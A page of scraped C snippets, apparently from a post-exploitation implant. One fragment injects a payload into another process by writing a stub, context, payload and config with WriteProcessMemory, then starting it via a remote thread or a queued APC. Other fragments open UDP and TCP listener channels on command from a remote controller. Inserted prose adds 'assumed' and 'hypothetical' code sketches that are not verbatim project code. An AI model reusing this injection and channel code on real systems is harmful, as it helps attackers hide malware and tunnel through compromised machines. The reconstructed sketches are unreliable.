		dprintf("[MIGRATE] Migrate stub: 0x%p -> %u bytes", lpMemory, dwMigrateStubLength);
		if (!WriteProcessMemory(hProcess, lpMemory, lpMigrateStub, dwMigrateStubLength, NULL))
		{
			BREAK_ON_ERROR("[MIGRATE] WriteProcessMemory 1 failed")
		}

		// Write the migrate context to memory...
		dprintf("[MIGRATE] Migrate context: 0x%p -> %u bytes", lpMemory + dwMigrateStubLength, sizeof(MIGRATECONTEXT));
		if (!WriteProcessMemory(hProcess, lpMemory + dwMigrateStubLength, &ctx, sizeof(MIGRATECONTEXT), NULL))
		{
			BREAK_ON_ERROR("[MIGRATE] WriteProcessMemory 2 failed")
		}

		// Write the migrate payload to memory...
		dprintf("[MIGRATE] Migrate payload: 0x%p -> %u bytes", ctx.p.lpPayload, dwPayloadLength);
		if (!WriteProcessMemory(hProcess, ctx.p.lpPayload, lpPayloadBuffer, dwPayloadLength, NULL))
		{
			BREAK_ON_ERROR("[MIGRATE] WriteProcessMemory 3 failed")
		}

		// finally write the configuration stub
		dprintf("[MIGRATE] Configuration: 0x%p -> %u bytes", ctx.p.lpPayload + dwPayloadLength, configSize);
		if (!WriteProcessMemory(hProcess, ctx.p.lpPayload + dwPayloadLength, config, configSize, NULL))
		{
			BREAK_ON_ERROR("[MIGRATE] WriteProcessMemory 4 failed")
		}

		// First we try to migrate by directly creating a remote thread in the target process
		if (inject_via_remotethread(remote, response, hProcess, dwDestinationArch, lpMemory, lpMemory + dwMigrateStubLength) != ERROR_SUCCESS)
		{
			dprintf("[MIGRATE] inject_via_remotethread failed, trying inject_via_apcthread...");

			// If that fails we can try to migrate via a queued APC in the target process
			if (inject_via_apcthread(remote, response, hProcess, dwProcessID, dwDestinationArch, lpMemory, lpMemory + dwMigrateStubLength) != ERROR_SUCCESS)
			{
				BREAK_ON_ERROR("[MIGRATE] inject_via_apcthread failed")
			}
		}

		dwResult = ERROR_SUCCESS;

	} while (0);
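The excerpt ends right after the injection attempt; the original function continues beyond this point. Purely as an assumed sketch (not the project's verbatim code), the epilogue such a routine needs would report a failure if the response was never sent, release the process and event handles plus the configuration block, and hand the result back through pResult:

	// Assumed epilogue, for illustration only.
	if (dwResult != ERROR_SUCCESS && response)
	{
		packet_transmit_response(dwResult, remote, response);
	}

	if (hProcess)
	{
		CloseHandle(hProcess);
	}

	if (hEvent)
	{
		CloseHandle(hEvent);
	}

	if (config)
	{
		free(config);
	}

	if (pResult)
	{
		*pResult = dwResult;
	}

	// On successful migration the server thread should stop processing, hence FALSE.
	return dwResult == ERROR_SUCCESS ? FALSE : TRUE;
}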
Example #8
/*
 * Create a new UDP socket channel, optionally bound to a local address/port, and optionally specifying
 * a remote peer host/port for future writes.
 */
DWORD request_net_udp_channel_open( Remote * remote, Packet * packet )
{
	DWORD dwResult           = ERROR_SUCCESS;
	UdpClientContext * ctx   = NULL;
	Packet * response        = NULL;
	char * lhost             = NULL;
	char * phost             = NULL;
	SOCKADDR_IN saddr        = {0};
	DatagramChannelOps chops = {0};

	do
	{
		response = packet_create_response( packet );
		if( !response )
			BREAK_WITH_ERROR( "[UDP] request_net_udp_channel_open. response == NULL", ERROR_NOT_ENOUGH_MEMORY );
		
		ctx = (UdpClientContext *)malloc( sizeof(UdpClientContext) );
		if( !ctx )
			BREAK_WITH_ERROR( "[UDP] request_net_udp_channel_open. ctx == NULL", ERROR_NOT_ENOUGH_MEMORY );

		memset( ctx, 0, sizeof(UdpClientContext) );
		
		ctx->sock.remote = remote;

		ctx->localport = (USHORT)( packet_get_tlv_value_uint( packet, TLV_TYPE_LOCAL_PORT ) & 0xFFFF );

		ctx->peerport = (USHORT)( packet_get_tlv_value_uint( packet, TLV_TYPE_PEER_PORT ) & 0xFFFF );

		lhost = packet_get_tlv_value_string( packet, TLV_TYPE_LOCAL_HOST );
		if( lhost )
			ctx->localhost.s_addr = inet_addr( lhost );
		else
			ctx->localhost.s_addr = INADDR_ANY;

		phost = packet_get_tlv_value_string( packet, TLV_TYPE_PEER_HOST );
		if( phost )
		{
			dprintf( "[UDP] request_net_udp_channel_open. phost=%s", phost );
			ctx->peerhost.s_addr = inet_addr( phost );
		}

		ctx->sock.fd = WSASocket( AF_INET, SOCK_DGRAM, IPPROTO_UDP, 0, 0, 0 );
		if( ctx->sock.fd == INVALID_SOCKET )
			BREAK_ON_WSAERROR( "[UDP] request_net_udp_channel_open. WSASocket failed" );

		saddr.sin_family      = AF_INET;
		saddr.sin_port        = htons( ctx->localport );
		saddr.sin_addr.s_addr = ctx->localhost.s_addr;

		if( bind( ctx->sock.fd, (SOCKADDR *)&saddr, sizeof(SOCKADDR_IN) ) == SOCKET_ERROR )
			BREAK_ON_WSAERROR( "[UDP] request_net_udp_channel_open. bind failed" );
		
		ctx->sock.notify = WSACreateEvent();
		if( ctx->sock.notify == WSA_INVALID_EVENT )
			BREAK_ON_WSAERROR( "[UDP] request_net_udp_channel_open. WSACreateEvent failed" );

		if( WSAEventSelect( ctx->sock.fd, ctx->sock.notify, FD_READ ) == SOCKET_ERROR )
			BREAK_ON_WSAERROR( "[UDP] request_net_udp_channel_open. WSAEventSelect failed" );

		memset( &chops, 0, sizeof(DatagramChannelOps) );
		chops.native.context = ctx;
		chops.native.write   = udp_channel_write;
		chops.native.close   = udp_channel_close;

		ctx->sock.channel = channel_create_datagram( 0, 0, &chops );
		if( !ctx->sock.channel )
			BREAK_WITH_ERROR( "[UDP] request_net_udp_channel_open. channel_create_stream failed", ERROR_INVALID_HANDLE );

		scheduler_insert_waitable( ctx->sock.notify, ctx, (WaitableNotifyRoutine)udp_channel_notify );

		packet_add_tlv_uint( response, TLV_TYPE_CHANNEL_ID, channel_get_id(ctx->sock.channel) );

		dprintf( "[UDP] request_net_udp_channel_open. UDP socket on channel %d (The local specified was %s:%d ) (The peer specified was %s:%d)",  channel_get_id( ctx->sock.channel ), inet_ntoa( ctx->localhost ), ctx->localport, inet_ntoa( ctx->peerhost ), ctx->peerport );

	} while( 0 );

	packet_transmit_response( dwResult, remote, response );

	do
	{
		if( dwResult == ERROR_SUCCESS )
			break;

		if( !ctx )		
			break;

		if( ctx->sock.fd )
			closesocket( ctx->sock.fd );
			
		if( ctx->sock.channel )
			channel_destroy( ctx->sock.channel, packet );

		free( ctx );

	} while( 0 );

	return ERROR_SUCCESS;
}
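The peer host/port captured above are intended for later writes on the datagram channel. The project's udp_channel_write is not shown here; purely as a hypothetical sketch, a write handler built on this context would typically send to the stored peer along these lines:

// Hypothetical sketch (assumption, not the project's udp_channel_write).
static DWORD sketch_udp_write( UdpClientContext * ctx, LPVOID buffer, DWORD length, LPDWORD written )
{
	SOCKADDR_IN peer = {0};
	int sent         = 0;

	peer.sin_family      = AF_INET;
	peer.sin_port        = htons( ctx->peerport );
	peer.sin_addr.s_addr = ctx->peerhost.s_addr;

	sent = sendto( ctx->sock.fd, (char *)buffer, (int)length, 0, (SOCKADDR *)&peer, sizeof(peer) );
	if( sent == SOCKET_ERROR )
		return WSAGetLastError();

	if( written )
		*written = (DWORD)sent;

	return ERROR_SUCCESS;
}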
Example #9
/*!
 * @brief Allocates a streaming TCP server channel.
 * @param remote Pointer to the remote instance.
 * @param packet Pointer to the request packet.
 * @returns Indication of success or failure.
 * @retval ERROR_SUCCESS Opening the server channel completed successfully.
 */
DWORD request_net_tcp_server_channel_open(Remote * remote, Packet * packet)
{
	DWORD dwResult = ERROR_SUCCESS;
	TcpServerContext * ctx = NULL;
	Packet * response = NULL;
	char * lhost = NULL;
	SOCKADDR_IN saddr = { 0 };
	StreamChannelOps chops = { 0 };
	USHORT lport = 0;

	do
	{
		response = packet_create_response(packet);
		if (!response)
		{
			BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. response == NULL", ERROR_NOT_ENOUGH_MEMORY);
		}

		ctx = (TcpServerContext *)malloc(sizeof(TcpServerContext));
		if (!ctx)
		{
			BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. ctx == NULL", ERROR_NOT_ENOUGH_MEMORY);
		}

		memset(ctx, 0, sizeof(TcpServerContext));

		ctx->remote = remote;

		lport = (USHORT)(packet_get_tlv_value_uint(packet, TLV_TYPE_LOCAL_PORT) & 0xFFFF);
		if (!lport)
		{
			BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. lport == NULL", ERROR_INVALID_HANDLE);
		}

		lhost = packet_get_tlv_value_string(packet, TLV_TYPE_LOCAL_HOST);
		if (!lhost)
		{
			lhost = "0.0.0.0";
		}

		ctx->fd = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
		if (ctx->fd == INVALID_SOCKET)
		{
			BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSASocket failed");
		}

		saddr.sin_family = AF_INET;
		saddr.sin_port = htons(lport);
		saddr.sin_addr.s_addr = inet_addr(lhost);

		if (bind(ctx->fd, (SOCKADDR *)&saddr, sizeof(SOCKADDR_IN)) == SOCKET_ERROR)
		{
#ifdef _WIN32
			dwResult = WSAGetLastError();
			if (dwResult != WSAEADDRNOTAVAIL)
#else
			dwResult = errno;
			if (dwResult != EADDRNOTAVAIL)
#endif
			{
				BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. bind failed");
			}

			dprintf("[TCP-SERVER] Failed to bind to %s, trying 0.0.0.0 ...", lhost);

			// try again, but this time bind to any/all interfaces.
			lhost = "0.0.0.0";
			saddr.sin_addr.s_addr = inet_addr(lhost);
			if (bind(ctx->fd, (SOCKADDR *)&saddr, sizeof(SOCKADDR_IN)) == SOCKET_ERROR)
			{
				BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. bind failed");
			}
			dwResult = ERROR_SUCCESS;
		}

		if (listen(ctx->fd, SOMAXCONN) == SOCKET_ERROR)
		{
			BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. listen failed");
		}

		ctx->notify = WSACreateEvent();
		if (ctx->notify == WSA_INVALID_EVENT)
		{
			BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSACreateEvent failed");
		}

		if (WSAEventSelect(ctx->fd, ctx->notify, FD_ACCEPT) == SOCKET_ERROR)
		{
			BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSAEventSelect failed");
		}

		memset(&chops, 0, sizeof(StreamChannelOps));
		chops.native.context = ctx;
		chops.native.close = tcp_channel_server_close;

		ctx->channel = channel_create_stream(0, CHANNEL_FLAG_SYNCHRONOUS, &chops);
		if (!ctx->channel)
		{
			BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. channel_create_stream failed", ERROR_INVALID_HANDLE);
		}

		scheduler_insert_waitable(ctx->notify, ctx, NULL, (WaitableNotifyRoutine)tcp_channel_server_notify, NULL);

		packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channel_get_id(ctx->channel));

		dprintf("[TCP-SERVER] request_net_tcp_server_channel_open. tcp server %s:%d on channel %d", lhost, lport, channel_get_id(ctx->channel));

	} while (0);

	packet_transmit_response(dwResult, remote, response);

	do
	{
		if (dwResult == ERROR_SUCCESS)
		{
			break;
		}

		dprintf("[TCP-SERVER] Error encountered %u 0x%x", dwResult, dwResult);

		if (!ctx)
		{
			break;
		}

		if (ctx->fd)
		{
			dprintf("[TCP-SERVER] Destroying socket");
			closesocket(ctx->fd);
		}

		if (ctx->channel)
		{
			dprintf("[TCP-SERVER] Destroying channel");
			channel_destroy(ctx->channel, packet);
		}

		free(ctx);

	} while (0);

	return dwResult;
}